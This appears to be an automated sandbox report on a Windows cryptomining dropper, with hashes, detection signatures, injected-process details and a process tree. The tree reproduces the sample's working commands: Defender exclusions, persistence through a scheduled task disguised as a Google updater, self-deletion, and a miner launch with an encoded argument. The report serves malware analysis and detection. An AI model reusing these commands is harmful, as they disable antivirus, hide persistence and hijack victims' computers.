Overview
overview
10Static
static
3grhsghsGHs...y8.exe
windows7-x64
10grhsghsGHs...y8.exe
windows10-2004-x64
10grhsghsGHs...SE.exe
windows7-x64
10grhsghsGHs...SE.exe
windows10-2004-x64
10grhsghsGHs...CD.exe
windows7-x64
10grhsghsGHs...CD.exe
windows10-2004-x64
10grhsghsGHs...Da.exe
windows7-x64
10grhsghsGHs...Da.exe
windows10-2004-x64
10grhsghsGHs...wq.exe
windows7-x64
10grhsghsGHs...wq.exe
windows10-2004-x64
10grhsghsGHs...r7.exe
windows7-x64
10grhsghsGHs...r7.exe
windows10-2004-x64
10grhsghsGHs...XJ.exe
windows7-x64
10grhsghsGHs...XJ.exe
windows10-2004-x64
10grhsghsGHs...eg.exe
windows7-x64
10grhsghsGHs...eg.exe
windows10-2004-x64
10grhsghsGHs...5H.exe
windows7-x64
10grhsghsGHs...5H.exe
windows10-2004-x64
10grhsghsGHs...XN.exe
windows7-x64
10grhsghsGHs...XN.exe
windows10-2004-x64
10grhsghsGHs...T3.exe
windows7-x64
10grhsghsGHs...T3.exe
windows10-2004-x64
10grhsghsGHs...9r.exe
windows7-x64
10grhsghsGHs...9r.exe
windows10-2004-x64
10grhsghsGHs...GR.exe
windows7-x64
10grhsghsGHs...GR.exe
windows10-2004-x64
10grhsghsGHs...EX.exe
windows7-x64
10grhsghsGHs...EX.exe
windows10-2004-x64
10grhsghsGHs...EA.exe
windows7-x64
10grhsghsGHs...EA.exe
windows10-2004-x64
10grhsghsGHs...FB.exe
windows7-x64
10grhsghsGHs...FB.exe
windows10-2004-x64
10Resubmissions
25-01-2024 16:55
240125-vfcyksbhgr 1024-01-2024 17:15
240124-vstf4aecaj 1023-01-2024 19:27
240123-x6cfvagbd9 1023-01-2024 19:27
240123-x6bvbafgem 1023-01-2024 19:27
240123-x6bjjsgbd8 1023-01-2024 19:27
240123-x6ax1sfgek 1023-01-2024 19:27
240123-x6abgsfgej 1023-01-2024 19:27
240123-x591qagbd7 1023-01-2024 19:27
240123-x59d7agbd6 1023-01-2024 19:27
240123-x584esgbd5 10Analysis
-
max time kernel
359s -
max time network
1797s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
23-01-2024 19:27
Static task
static1
Behavioral task
behavioral1
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral11
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win7-20231129-en
Behavioral task
behavioral12
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win7-20231129-en
Behavioral task
behavioral16
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral19
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win7-20231215-en
Behavioral task
behavioral20
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral21
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral23
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral27
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win7-20231215-en
Behavioral task
behavioral28
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win7-20231215-en
Behavioral task
behavioral30
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral31
Sample
grhsghsGHswgh/Yvdp8t5knpQz7sFB.exe
Resource
win7-20231215-en
General
-
Target
grhsghsGHswgh/Yvdp8t5knpQz7sFB.exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
description pid Process procid_target PID 1976 created 1264 1976 Yvdp8t5knpQz7sFB.exe 15 PID 1976 created 1264 1976 Yvdp8t5knpQz7sFB.exe 15 PID 1976 created 1264 1976 Yvdp8t5knpQz7sFB.exe 15 PID 1976 created 1264 1976 Yvdp8t5knpQz7sFB.exe 15 PID 700 created 1264 700 updater.exe 15 PID 700 created 1264 700 updater.exe 15 PID 700 created 1264 700 updater.exe 15 PID 700 created 1264 700 updater.exe 15 PID 912 created 1264 912 conhost.exe 15 PID 700 created 1264 700 updater.exe 15 -
XMRig Miner payload 29 IoCs
resource yara_rule behavioral31/memory/2116-70-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-72-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-74-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-76-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-80-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-82-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-84-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-86-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-88-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-90-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-92-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-94-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-96-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-98-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-100-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-102-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-104-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-106-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-108-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-110-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-112-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-119-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-121-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-123-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-125-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-127-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-129-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-131-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral31/memory/2116-133-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Deletes itself 1 IoCs
pid Process 2584 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 700 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 324 taskeng.exe -
resource yara_rule behavioral31/memory/2116-65-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-70-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-72-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-74-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-76-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-80-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-82-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-84-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-86-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-88-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-90-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-92-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-94-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-96-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-98-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-100-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-102-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-104-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-106-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-108-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-110-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-112-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-119-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-121-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-123-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-125-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-127-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-129-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-131-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral31/memory/2116-133-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 700 set thread context of 912 700 updater.exe 54 PID 700 set thread context of 2116 700 updater.exe 55 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe Yvdp8t5knpQz7sFB.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2768 schtasks.exe 544 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 884 WMIC.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 605ad1033451da01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 1976 Yvdp8t5knpQz7sFB.exe 1976 Yvdp8t5knpQz7sFB.exe 2672 powershell.exe 1976 Yvdp8t5knpQz7sFB.exe 1976 Yvdp8t5knpQz7sFB.exe 2944 powershell.exe 1976 Yvdp8t5knpQz7sFB.exe 1976 Yvdp8t5knpQz7sFB.exe 1976 Yvdp8t5knpQz7sFB.exe 1976 Yvdp8t5knpQz7sFB.exe 2636 powershell.exe 700 updater.exe 700 updater.exe 364 powershell.exe 700 updater.exe 700 updater.exe 2796 powershell.exe 700 updater.exe 700 updater.exe 700 updater.exe 700 updater.exe 912 conhost.exe 912 conhost.exe 700 updater.exe 700 updater.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 472 Process not Found -
Suspicious use of AdjustPrivilegeToken 31 IoCs
description pid Process Token: SeDebugPrivilege 2672 powershell.exe Token: SeDebugPrivilege 2944 powershell.exe Token: SeDebugPrivilege 2636 powershell.exe Token: SeDebugPrivilege 364 powershell.exe Token: SeDebugPrivilege 2796 powershell.exe Token: SeDebugPrivilege 700 updater.exe Token: SeAssignPrimaryTokenPrivilege 884 WMIC.exe Token: SeIncreaseQuotaPrivilege 884 WMIC.exe Token: SeSecurityPrivilege 884 WMIC.exe Token: SeTakeOwnershipPrivilege 884 WMIC.exe Token: SeLoadDriverPrivilege 884 WMIC.exe Token: SeSystemtimePrivilege 884 WMIC.exe Token: SeBackupPrivilege 884 WMIC.exe Token: SeRestorePrivilege 884 WMIC.exe Token: SeShutdownPrivilege 884 WMIC.exe Token: SeSystemEnvironmentPrivilege 884 WMIC.exe Token: SeUndockPrivilege 884 WMIC.exe Token: SeManageVolumePrivilege 884 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 884 WMIC.exe Token: SeIncreaseQuotaPrivilege 884 WMIC.exe Token: SeSecurityPrivilege 884 WMIC.exe Token: SeTakeOwnershipPrivilege 884 WMIC.exe Token: SeLoadDriverPrivilege 884 WMIC.exe Token: SeSystemtimePrivilege 884 WMIC.exe Token: SeBackupPrivilege 884 WMIC.exe Token: SeRestorePrivilege 884 WMIC.exe Token: SeShutdownPrivilege 884 WMIC.exe Token: SeSystemEnvironmentPrivilege 884 WMIC.exe Token: SeUndockPrivilege 884 WMIC.exe Token: SeManageVolumePrivilege 884 WMIC.exe Token: SeLockMemoryPrivilege 2116 conhost.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2944 wrote to memory of 2768 2944 powershell.exe 32 PID 2944 wrote to memory of 2768 2944 powershell.exe 32 PID 2944 wrote to memory of 2768 2944 powershell.exe 32 PID 2584 wrote to memory of 2652 2584 cmd.exe 37 PID 2584 wrote to memory of 2652 2584 cmd.exe 37 PID 2584 wrote to memory of 2652 2584 cmd.exe 37 PID 2636 wrote to memory of 2560 2636 powershell.exe 38 PID 2636 wrote to memory of 2560 2636 powershell.exe 38 PID 2636 wrote to memory of 2560 2636 powershell.exe 38 PID 324 wrote to memory of 700 324 taskeng.exe 40 PID 324 wrote to memory of 700 324 taskeng.exe 40 PID 324 wrote to memory of 700 324 taskeng.exe 40 PID 2796 wrote to memory of 544 2796 powershell.exe 47 PID 2796 wrote to memory of 544 2796 powershell.exe 47 PID 2796 wrote to memory of 544 2796 powershell.exe 47 PID 700 wrote to memory of 912 700 updater.exe 54 PID 1904 wrote to memory of 884 1904 cmd.exe 48 PID 1904 wrote to memory of 884 1904 cmd.exe 48 PID 1904 wrote to memory of 884 1904 cmd.exe 48 PID 700 wrote to memory of 2116 700 updater.exe 55 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1264
-
C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Yvdp8t5knpQz7sFB.exe"C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Yvdp8t5knpQz7sFB.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2768
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Yvdp8t5knpQz7sFB.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2652
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:2560
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:544
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1592
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1904
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:912
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {068D6E7A-35C4-4972-B0D5-1812741B2EB6} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:324 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:700
-
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor1⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:884
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.0MB
MD59f61b7421c190b4263bb6b84e526952b
SHA115ac6264e724e653d2e153d90c153a0627165b1c
SHA256cad2390838baa49cc3d6494cbbbe21b7996ff95d37034d05ee13726b783fa745
SHA5123e3d9141a958faecacf528384b381b6f9bde00e47303903e94436e6ad8804cc4be3b65e4d146598939de9125971419ca72feaf1f1998f6aa30c4ef605642f0f3
-
Filesize
775KB
MD59dbd7b23cf8630e642b7250fe49b3e81
SHA1fb25b9e08d1961a4e980fb11c543bfc182fa1eda
SHA25608dc702c5c84d7d61e48c7cd2bdf900e329f14855d5b7f7a122fc1c3ad2b94ed
SHA51256fc9bf046627e6f1e5224ec00c0bd8c79721260c95008d0c940b2da526d98aa72244f2e1430c368adee1ec660d813f7889a29dcd1a50d95f0bc0394353187d8
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD56649d6b1a44aefa138b743603c31d52c
SHA183bd6acd54ed084560ac468b69666d69eca513a1
SHA25637f944ede1fde7c3605d5cdf197d0db7d2a85d1aa95c2bbb3f2a0d2e0c02c5a3
SHA512083beaff81130b1ba19fb432314879005c3a486f0bd2c91fbdd41c8e435848045c3100ad2a3d70dc23023c36bbfd6790a7d6e6bc2ca11cef0bc141ad37b95898
-
Filesize
1006KB
MD58a28d299ebcc790b17ee2caaea12e030
SHA19123bcacb62eafe55ba1846b920d1c4447ffa8c5
SHA25649641f4b96fca2e3d02db743fbcaae97d7b48c9aa6a3d9bb47308c0316023865
SHA512f97fe3ca490f7594bac7568edf5f2687606a6b10aeb44fc877dd3eb26c9a28bd1314d56a2c9f9e2d7d032fc17f9aebcedcc2fc878405ed71d8b912999de60b35